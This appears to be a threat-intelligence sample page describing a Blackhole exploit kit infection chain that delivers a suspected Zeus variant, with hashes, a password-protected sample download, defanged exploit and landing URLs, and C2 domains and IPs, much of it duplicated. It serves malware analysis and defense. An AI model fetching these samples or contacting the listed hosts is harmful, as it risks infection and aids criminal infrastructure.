File: KB971033.exe
Size: 201216
MD5: EC750B75E83749C715D7834E130FCE8E
File: hnszs0.exe
Size: 184832
MD5: 9DB4174373601F74FCE0ECBC77A9577D
Sample credit Bryan Nolen
Download (pass infected)
LIST OF FILES INCLUDED
│ investigation_notes.txt
│
├───dropped_files
│ ├───exe
│ │ hnszs0.exe
│ │ KB971033.exe
│ │
│ ├───java
│ │ jar_cache.zip
│ │
│ ├───pdf
│ │ ap1.pdf
│ │ ap2.pdf
│ │
│ └───swf
│ score.swf
│
├───email
│ MSUPDATE.eml
│
├───extracted_files
│ pid_1412_Explorer_Dumped.EXE
│
├───html
│ exploit.html
│ landing.html
│
└───pcap
dump.pcap
Quick analysis made by Bryan Nolen
Landing page (hxxp://volozhin.gov.by/pub/KB971033/?clien-e=3D1093821896211 and saved as html/landing.html) contains a hidden IFRAME that leads to the exploit page. This landing page also contains a META REFRESH that leads to another suspect binary (hxxp://volozhin.gov.by/pub/KB971033/KB971033.exe saved as dropped_files/exe/KB971033.exe) - detection on this second binary is low ( https://www.virustotal.com/file/0e14f5e6cdab9218135d3a7eed11f0457c9934210859f6075d63bc609469d43b/analysis/1335596875/ )
Exploit page (hxxp://fewfewfewfew.ibiz.cc/main.php?page=95fc4549d83b0486 and saved as html/exploit.html) utilises a trio of exploits designed to attack java, adobe acrobat, or flash.
Analysis of the javascript was perfomed with the assistance of URLQUERY report link (http://urlquery.net/report.php?id=47909).
The attack payloads are saved as
The "final" malicious payload is saved as (dropped_files/exe/hnszs0.exe) and its detection is VERY poor ( https://www.virustotal.com/file/c48df0394939fccb9a3ac0853d0ae696d04e7c5230d3a6468ebce257a0be4ccc/analysis/1335598639/ )
A copy of explorer.exe extracted from the memory image after infection is included, based on observations this is the process it migrated into after infection. It is saved in (extracted_files/pid_1412_Explorer_Dumped.EXE)
PCAP is supplied in the pcap folder. The hosts identified in this malware are:
Landing Page: volozhin.gov.by 212.98.162.62
Exploit Page: fewfewfewfew.ibiz.cc 83.69.233.156
C2: google-analytics-sv1.com 91.230.147.222
(alt C2): localdomain01.com 91.230.147.145
Note: the Alternate C2 was seen in earlier investigations of this malware and changed to the C2 address above when this round of investigation was performed.
Full memory dumps from my sandbox VM avaliable on request.
I have a strong suspicion this is a Zeus varient.
-Bryan Nolen <bryan _at_ arc .dot. net .dot. au>
@bryannolen
Size: 201216
MD5: EC750B75E83749C715D7834E130FCE8E
File: hnszs0.exe
Size: 184832
MD5: 9DB4174373601F74FCE0ECBC77A9577D
Sample credit Bryan Nolen
Download (pass infected) LIST OF FILES INCLUDED
│ investigation_notes.txt
│
├───dropped_files
│ ├───exe
│ │ hnszs0.exe
│ │ KB971033.exe
│ │
│ ├───java
│ │ jar_cache.zip
│ │
│ │ ap1.pdf
│ │ ap2.pdf
│ │
│ └───swf
│ score.swf
│
│ MSUPDATE.eml
│
├───extracted_files
│ pid_1412_Explorer_Dumped.EXE
│
├───html
│ exploit.html
│ landing.html
│
└───pcap
dump.pcap
Quick analysis made by Bryan Nolen
Exploit page (hxxp://fewfewfewfew.ibiz.cc/main.php?page=95fc4549d83b0486 and saved as html/exploit.html) utilises a trio of exploits designed to attack java, adobe acrobat, or flash.
Analysis of the javascript was perfomed with the assistance of URLQUERY report link (http://urlquery.net/report.php?id=47909).
The attack payloads are saved as
- dropped_files/pdf/ap1.pdf
- dropped_files/pdf/ap2.pdf
- dropped_files/swf/score.swf
- dropped_files/java/jar_cache.zip
The "final" malicious payload is saved as (dropped_files/exe/hnszs0.exe) and its detection is VERY poor ( https://www.virustotal.com/file/c48df0394939fccb9a3ac0853d0ae696d04e7c5230d3a6468ebce257a0be4ccc/analysis/1335598639/ )
A copy of explorer.exe extracted from the memory image after infection is included, based on observations this is the process it migrated into after infection. It is saved in (extracted_files/pid_1412_Explorer_Dumped.EXE)
PCAP is supplied in the pcap folder. The hosts identified in this malware are:
Landing Page: volozhin.gov.by 212.98.162.62
Exploit Page: fewfewfewfew.ibiz.cc 83.69.233.156
C2: google-analytics-sv1.com 91.230.147.222
(alt C2): localdomain01.com 91.230.147.145
Note: the Alternate C2 was seen in earlier investigations of this malware and changed to the C2 address above when this round of investigation was performed.
Full memory dumps from my sandbox VM avaliable on request.
I have a strong suspicion this is a Zeus varient.
-Bryan Nolen <bryan _at_ arc .dot. net .dot. au>
@bryannolen
SITE TYPE
LEGITIMATE, COMPROMISED
212.98.162.62
volozhin.gov.by Belarus AS12406 Business network j.v. Business Network JV
BLACKHOLE
83.69.233.156
fewfewfewfew.ibiz.cc Russian Federation AS28762 AWAX Telecom Ltd AWAX Telecom Ltd.
PAYLOAD - ZEUS
C2
91.230.147.222
google-analytics-sv1.com Russian Federation AS57189 PE Spiridonova Vera Ana OOO Aldevir Invest
LEGITIMATE, COMPROMISED
212.98.162.62
volozhin.gov.by Belarus AS12406 Business network j.v. Business Network JV
BLACKHOLE
83.69.233.156
fewfewfewfew.ibiz.cc Russian Federation AS28762 AWAX Telecom Ltd AWAX Telecom Ltd.
PAYLOAD - ZEUS
C2
91.230.147.222
google-analytics-sv1.com Russian Federation AS57189 PE Spiridonova Vera Ana OOO Aldevir Invest
C2
91.230.147.145
91.230.147.145
localdomain01.com Russian Federation AS57189 PE Spiridonova Vera Ana OOO Aldevir Invest
